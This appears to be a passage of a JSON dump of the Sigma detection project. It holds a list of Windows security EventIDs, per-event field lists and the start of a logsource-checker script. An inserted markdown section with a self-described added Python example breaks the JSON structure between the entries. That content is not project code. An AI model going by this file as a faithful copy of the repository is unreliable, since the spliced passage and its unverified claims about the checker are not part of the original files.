access.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145)\n- [5148: The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5148)\n- [5149: The DoS attack has subsided and normal processing is being resumed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5149)\n- [5150: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5150)\n- [5151: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5151)\n- [5152: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152)\n- [5153: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5153)\n- [5154: The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5154)\n- [5155: The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5155)\n- [5156: The Windows Filtering Platform has permitted a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156)\n- [5157: The Windows Filtering Platform has blocked a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157)\n- [5158: The Windows Filtering Platform has permitted a bind to a local 
port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5158)\n- [5159: The Windows Filtering Platform has blocked a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5159)\n- [5168: SPN check for SMB/SMB2 failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5168)\n- [5376: Credential Manager credentials were backed up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5376)\n- [5377: Credential Manager credentials were restored from a backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5377)\n- [5378: The requested credentials delegation was disallowed by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5378)\n- [5440: The following callout was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5440)\n- [5441: The following filter was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5441)\n- [5442: The following provider was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5442)\n- [5443: The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5443)\n- [5444: The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5444)\n- [5446: A Windows Filtering Platform callout has been 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5446)\n- [5447: A Windows Filtering Platform filter has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5447)\n- [5448: A Windows Filtering Platform provider has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5448)\n- [5449: A Windows Filtering Platform provider context has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5449)\n- [5450: A Windows Filtering Platform sub-layer has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5450)\n- [5451: An IPsec Quick Mode security association was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5451)\n- [5452: An IPsec Quick Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5452)\n- [5453: An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5453)\n- [5456: PAStore Engine applied Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5456)\n- [5457: PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5457)\n- [5458: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5458)\n- [5459: PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the 
computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5459)\n- [5460: PAStore Engine applied local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5460)\n- [5461: PAStore Engine failed to apply local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5461)\n- [5462: PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5462)\n- [5463: PAStore Engine polled for changes to the active IPsec policy and detected no changes.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5463)\n- [5464: PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5464)\n- [5465: PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5465)\n- [5466: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5466)\n- [5467: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. 
The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5467)\n- [5468: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5468)\n- [5471: PAStore Engine loaded local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5471)\n- [5472: PAStore Engine failed to load local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5472)\n- [5473: PAStore Engine loaded directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5473)\n- [5474: PAStore Engine failed to load directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5474)\n- [5477: PAStore Engine failed to add quick mode filter.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5477)\n- [5478: IPsec Services has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5478)\n- 5479: IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.\n- 5480: IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. 
Use the IP Security Monitor snap-in to diagnose the problem.\n- 5483: IPsec Services failed to initialize RPC server. IPsec Services could not be started.\n- 5484: IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.\n- 5485: IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.\n- [5632: A request was made to authenticate to a wireless network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5632)\n- [5633: A request was made to authenticate to a wired network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5633)\n- [5712: A Remote Procedure Call (RPC) was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5712)\n- [5888: An object in the COM+ Catalog was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5888)\n- [5889: An object was deleted from the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5889)\n- [5890: An object was added to the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5890)\n- [6144: Security policy in the group policy objects has been applied successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6144)\n- [6145: One or more errors occurred while processing security policy in the group policy objects.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6145)\n- [6272: Network Policy Server granted access to 
a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6272)\n- [6273: Network Policy Server denied access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6273)\n- [6274: Network Policy Server discarded the request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6274)\n- [6275: Network Policy Server discarded the accounting request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6275)\n- [6276: Network Policy Server quarantined a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6276)\n- [6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6277)\n- [6278: Network Policy Server granted full access to a user because the host met the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6278)\n- [6279: Network Policy Server locked the user account due to repeated failed authentication attempts.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6279)\n- [6280: Network Policy Server unlocked the user account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6280)\n- [6281: Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. 
The invalid hashes could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281)\n- [6400: BranchCache: Received an incorrectly formatted response while discovering availability of content.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6400)\n- [6401: BranchCache: Received invalid data from a peer. Data discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6401)\n- [6402: BranchCache: The message to the hosted cache offering it data is incorrectly formatted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6402)\n- [6403: BranchCache: The hosted cache sent an incorrectly formatted response to the client.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6403)\n- [6404: BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6404)\n- [6405: BranchCache: %2 instance(s) of event id %1 occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6405)\n- [6406: %1 registered to Windows Firewall to control filtering for the following: %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6406)\n- 6407: N/A\n- [6408: Registered product %1 failed and Windows Firewall is now controlling the filtering for %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6408)\n- [6409: BranchCache: A service connection point object could not be parsed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6409)\n- [6410: Code integrity determined that a file does not meet the security requirements to load into a process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6410)\n- 
[6416: A new external device was recognized by the System](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416)\n- [6419: A request was made to disable a device](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6419)\n- [6420: A device was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6420)\n- [6421: A request was made to enable a device.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6421)\n- [6422: A device was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6422)\n- [6423: The installation of this device is forbidden by system policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423)\n- [6424: The installation of this device was allowed, after having previously been forbidden by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6424)\n\n</details>\n\n## Event Fields\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4624\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- LogonType\n- LogonProcessName\n- AuthenticationPackageName\n- WorkstationName\n- LogonGuid\n- TransmittedServices\n- LmPackageName\n- KeyLength\n- ProcessId\n- ProcessName\n- IpAddress\n- IpPort\n- ImpersonationLevel\n- RestrictedAdminMode\n- RemoteCredentialGuard\n- TargetOutboundUserName\n- TargetOutboundDomainName\n- VirtualAccount\n- TargetLinkedLogonId\n- ElevatedToken\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4627\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- 
TargetLogonId\n- LogonType\n- EventIdx\n- EventCountTotal\n- GroupMembership\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4663\n\n<details>\n    <summary>Expand Details</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- ObjectType\n- ObjectName\n- HandleId\n- AccessList\n- AccessMask\n- ProcessId\n- ProcessName\n- ResourceAttributes\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4670\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- ObjectType\n- ObjectName\n- HandleId\n- OldSd\n- NewSd\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4672\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- PrivilegeList\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4673\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- Service\n- PrivilegeList\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4688\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- NewProcessId\n- NewProcessName\n- TokenElevationType\n- ProcessId\n- CommandLine\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ParentProcessName\n- MandatoryLabel\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4689\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- Status\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft 
Windows Security Auditing / EventID: 4702\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TaskName\n- TaskContentNew\n- ClientProcessStartKey\n- ClientProcessId\n- ParentProcessId\n- RpcCallClientLocality\n- FQDN\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4703\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ProcessName\n- ProcessId\n- EnabledPrivilegeList\n- DisabledPrivilegeList\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4957\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- RuleId\n- RuleName\n- RuleAttr\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 5447\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ProcessId\n- UserSid\n- UserName\n- ProviderKey\n- ProviderName\n- ChangeType\n- FilterKey\n- FilterName\n- FilterType\n- FilterId\n- LayerKey\n- LayerName\n- LayerId\n- Weight\n- Conditions\n- Action\n- CalloutKey\n- CalloutName\n```\n\n</details>\n"
  },
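The event-ID list and the per-event field lists in the documentation above, together with the audit-subcategory table in `documentation/tools/sigma-logsource-checker.py`, answer two questions a practitioner has to settle before a rule goes live: is the host configured to emit the EventIDs the rule selects on at all, and does the chosen event carry the fields the rule filters on. The following is an added example (not code from the Sigma project) that performs both checks over a subset of that table. The Sigma-field-to-4688-field mapping, the enabled-subcategory set and the two rules are constructed for the example; the mapping in particular is an assumption for illustration, not the project's own pipeline.

```python
"""Added example: what a Sigma rule needs from a Windows host before it can fire.

Check 1: which Advanced Audit Policy subcategories must be enabled for the
Security EventIDs a rule selects on (GUID table is a subset of
SECURITY_EVENT_ID_MAPPING in sigma-logsource-checker.py).
Check 2: whether a process_creation rule's fields exist in Security/4688 and
Sysmon/1 (field lists from the "Event Fields" section and the checker).
Everything under "constructed" below is made up for this example."""
from collections import defaultdict

# GUID -> (EventIDs, subcategory name); subset of the checker script's table.
SUBCATEGORIES = {
    "{0CCE9215-69AE-11D9-BED3-505054503030}": ([4624, 4625, 4648, 4675], "Audit Logon"),
    "{0CCE9217-69AE-11D9-BED3-505054503030}": ([4625], "Audit Account Lockout"),
    "{0CCE921B-69AE-11D9-BED3-505054503030}": ([4964, 4672], "Audit Special Logon"),
    "{0CCE922B-69AE-11D9-BED3-505054503030}": ([4688, 4696], "Audit Process Creation"),
    "{0CCE9224-69AE-11D9-BED3-505054503030}": ([5140, 5142, 5143, 5144, 5168], "Audit File Share"),
    "{0CCE9244-69AE-11D9-BED3-505054503030}": ([5145], "Audit Detailed File Share"),
}

# Reverse index built once: EventID -> [(GUID, name), ...]. One event can be
# produced by several subcategories (4625 by Audit Logon and Audit Account Lockout).
EVENT_TO_SUBCATEGORIES = defaultdict(list)
for _guid, (_ids, _name) in SUBCATEGORIES.items():
    for _eid in _ids:
        EVENT_TO_SUBCATEGORIES[_eid].append((_guid, _name))

# Field lists from the "Event Fields" section (4688) and the checker (Sysmon/1).
SECURITY_4688_FIELDS = {
    "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId",
    "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine",
    "TargetUserSid", "TargetUserName", "TargetDomainName", "TargetLogonId",
    "ParentProcessName", "MandatoryLabel",
}
SYSMON_1_FIELDS = {
    "RuleName", "UtcTime", "ProcessGuid", "ProcessId", "Image", "FileVersion",
    "Description", "Product", "Company", "OriginalFileName", "CommandLine",
    "CurrentDirectory", "User", "LogonGuid", "LogonId", "TerminalSessionId",
    "IntegrityLevel", "Hashes", "ParentProcessGuid", "ParentProcessId", "ParentImage",
    "ParentCommandLine", "ParentUser",
}

# ASSUMPTION (constructed for this example): how generic Sigma process_creation
# field names land in Security/4688. Unlisted fields are assumed to keep their name.
SIGMA_TO_4688 = {
    "Image": "NewProcessName", "ParentImage": "ParentProcessName",
    "ProcessId": "NewProcessId", "ParentProcessId": "ProcessId",
    "User": "SubjectUserName", "LogonId": "SubjectLogonId",
    "IntegrityLevel": "MandatoryLabel",
}


def _selection_items(detection):
    """Yield every (field, value) pair in a detection block, skipping the
    condition and keyword-only selections (plain strings)."""
    for name, selection in detection.items():
        if name == "condition":
            continue
        for item in selection if isinstance(selection, list) else [selection]:
            if isinstance(item, dict):
                yield from item.items()


def rule_fields(detection):
    """Field names the rule filters on, with Sigma modifiers (|contains, ...) stripped."""
    return {key.split("|", 1)[0] for key, _ in _selection_items(detection)}


def event_ids_in(detection):
    """Every EventID the rule selects on, whether given as a scalar or a list."""
    ids = set()
    for key, value in _selection_items(detection):
        if key.split("|", 1)[0] == "EventID":
            ids.update(int(v) for v in (value if isinstance(value, list) else [value]))
    return ids


def missing_subcategories(detection, enabled_guids):
    """Map each selected EventID the host will NOT log to the subcategory names
    that would produce it. An event counts as covered as soon as any one of its
    producing subcategories is enabled."""
    missing = {}
    for eid in sorted(event_ids_in(detection)):
        producers = EVENT_TO_SUBCATEGORIES.get(eid)
        if not producers:
            missing[eid] = ["unknown EventID (not in table)"]
        elif not any(guid in enabled_guids for guid, _ in producers):
            missing[eid] = [name for _, name in producers]
    return missing


def unsupported_fields(detection, command_line_logging):
    """For a process_creation rule, list the Sigma fields each source cannot
    provide. Security/4688 carries CommandLine only when the policy
    'Include command line in process creation events' is enabled."""
    fields = rule_fields(detection)
    security_fields = set(SECURITY_4688_FIELDS)
    if not command_line_logging:
        security_fields.discard("CommandLine")
    return {
        "Security/4688": sorted(f for f in fields if SIGMA_TO_4688.get(f, f) not in security_fields),
        "Sysmon/1": sorted(f for f in fields if f not in SYSMON_1_FIELDS),
    }


# Constructed inputs: a host with only Audit Logon enabled, and two rules.
ENABLED = {"{0CCE9215-69AE-11D9-BED3-505054503030}"}
LOGON_RULE = {"selection": {"EventID": [4624, 4625, 4672], "LogonType": 10}, "condition": "selection"}
PROC_RULE = {
    "selection": [
        {"Image|endswith": "\\dllhost.exe", "ParentImage|endswith": "\\cmd.exe"},
        {"CommandLine|contains": "dllhost", "Hashes|contains": "IMPHASH="},
    ],
    "condition": "selection",
}

if __name__ == "__main__":
    print(missing_subcategories(LOGON_RULE, ENABLED))
    print(unsupported_fields(PROC_RULE, command_line_logging=False))
```

Two details matter in practice: 4625 is reported as covered when either Audit Logon or Audit Account Lockout is enabled, because both subcategories emit it; and a rule that filters on `CommandLine` cannot be served by 4688 until "Include command line in process creation events" is turned on, which is the policy the checker's OTHER_EVENT_ID_MAPPING tracks. A real rule file would be loaded with `yaml.safe_load` and its `detection` block passed in unchanged.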
  {
    "path": "documentation/tools/sigma-logsource-checker.py",
    "content": "# Author: Nasreddine Bencherchali (@nas_bench) / Nextron Systems\n\n__version__ = \"0.1.0\"\n\nfrom time import sleep\nimport yaml\nimport os\nimport argparse\nfrom colorama import init\nfrom colorama import Fore\nimport collections\nimport xml.etree.ElementTree as ET\nfrom collections import defaultdict\n\nSECURITY_EVENT_ID_MAPPING = {\n    # Account Logon\n    \"{0CCE923F-69AE-11D9-BED3-505054503030}\": {\"EventIDs\": [4774, 4775, 4776, 4777], \"Name\": \"Audit Credential Validation\"},\n    \"{0CCE9242-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4768, 4771, 4772], \"Name\": \"Audit Kerberos Authentication Service\"},\n    \"{0CCE9240-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4769, 4770, 4773], \"Name\": \"Audit Kerberos Service Ticket Operations\"},\n    \"{0CCE9241-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [], \"Name\": \"Audit Other Account Logon Events\"},\n    # Account Management\n    \"{0CCE9239-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792], \"Name\": \"Audit Application Group Management\"},\n    \"{0CCE9236-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4741, 4742, 4743], \"Name\": \"Audit Computer Account Management\"},\n    \"{0CCE9238-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4749, 4750, 4751, 4752, 4753], \"Name\": \"Audit Distribution Group Management\"},\n    \"{0CCE923A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4782, 4793], \"Name\": \"Audit Other Account Management Events\"},\n    \"{0CCE9237-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4731, 4732, 4733, 4734, 4735, 4764, 4799, 4727, 4737, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758], \"Name\": \"Audit Security Group Management\"},\n    \"{0CCE9235-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4765, 4766, 4767, 4780, 4781, 4794, 4798, 5376, 5377], \"Name\": \"Audit User Account Management\"},\n    # Detailed Tracking\n   
 \"{0CCE922D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4692, 4693, 4694, 4695], \"Name\": \"Audit DPAPI Activity\"},\n    \"{0CCE9248-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [6416, 6419, 6420, 6421, 6422, 6423, 6424], \"Name\": \"Audit PNP Activity\"},\n    \"{0CCE922B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4688, 4696], \"Name\": \"Audit Process Creation\"},\n    \"{0CCE922C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4689], \"Name\": \"Audit Process Termination\"},\n    \"{0CCE922E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5712], \"Name\": \"Audit RPC Events\"},\n    \"{0CCE924A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4703], \"Name\": \"Audit Token Right Adjusted\"},\n    # DS Access\n    \"{0CCE923E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4928, 4929, 4930, 4931, 4934, 4935, 4936, 4937], \"Name\": \"Audit Detailed Directory Service Replication\"},\n    \"{0CCE923B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4661, 4662], \"Name\": \"Audit Directory Service Access\"},\n    \"{0CCE923C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5136, 5137, 5138, 5139, 5141], \"Name\": \"Audit Directory Service Changes\"},\n    \"{0CCE923D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4932, 4933], \"Name\": \"Audit Directory Service Replication\"},\n    # Logon/Logoff\n    \"{0CCE9217-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4625], \"Name\": \"Audit Account Lockout\"},\n    \"{0CCE9247-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4626], \"Name\": \"Audit User/Device Claims\"},\n    \"{0CCE9249-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4627], \"Name\": \"Audit Group Membership\"},\n    \"{0CCE921A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4978, 4979, 4980, 4981, 4982, 4983, 4984], \"Name\": \"Audit IPsec Extended Mode\"},\n    \"{0CCE9218-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4646, 4650, 4651, 4652, 4653, 4655, 4976, 5049, 5453], \"Name\": \"Audit IPsec Main 
Mode\"},\n    \"{0CCE9219-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4977, 5451, 5452], \"Name\": \"Audit IPsec Quick Mode\"},\n    \"{0CCE9216-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4634, 4647], \"Name\": \"Audit Logoff\"},\n    \"{0CCE9215-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4624, 4625, 4648, 4675], \"Name\": \"Audit Logon\"},\n    \"{0CCE9243-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280], \"Name\": \"Audit Network Policy Server\"},\n    \"{0CCE921C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4649, 4778, 4779, 4800, 4801, 4802, 4803, 5378, 5632, 5633], \"Name\": \"Audit Other Logon/Logoff Events\"},\n    \"{0CCE921B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4964, 4672], \"Name\": \"Audit Special Logon\"},\n    # Object Access\n    \"{0CCE9222-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4665, 4666, 4667, 4668], \"Name\": \"Audit Application Generated\"},\n    \"{0CCE9221-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898], \"Name\": \"Audit Certification Services\"},\n    \"{0CCE9244-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5145], \"Name\": \"Audit Detailed File Share\"},\n    \"{0CCE9224-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5140, 5142, 5143, 5144, 5168], \"Name\": \"Audit File Share\"},\n    \"{0CCE921D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4660, 4663, 4664, 4670, 4985, 5051], \"Name\": \"Audit File System\"},\n    \"{0CCE9226-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5031, 5150, 5151, 5154, 5155, 5156, 5157, 5158, 5159], \"Name\": \"Audit Filtering Platform Connection\"},\n    \"{0CCE9225-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5152, 5153], \"Name\": \"Audit Filtering Platform Packet Drop\"},\n    
